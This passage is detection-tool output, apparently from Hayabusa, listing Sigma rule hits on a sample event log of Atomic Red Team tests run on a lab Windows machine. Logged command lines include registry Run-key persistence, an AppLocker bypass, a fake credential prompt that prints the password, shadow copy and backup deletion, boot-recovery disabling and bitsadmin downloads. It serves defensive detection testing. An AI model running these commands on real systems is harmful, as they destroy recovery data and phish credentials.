Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:45:06.213 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:45:31.287 +09:00,MSEDGEWIN10,11,high,PowerShell Writing Startup Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library 
C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll : Path: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:46:51.957 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
+2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe delete shadows /all /quiet : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wbadmin.exe delete catalog -quiet : Path: C:\Windows\System32\wbadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wbengine.exe"" : Path: C:\Windows\System32\wbengine.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\vds.exe : Path: C:\Windows\System32\vds.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Modification of Boot 
Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} recoveryenabled no : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground 
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /create AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md 
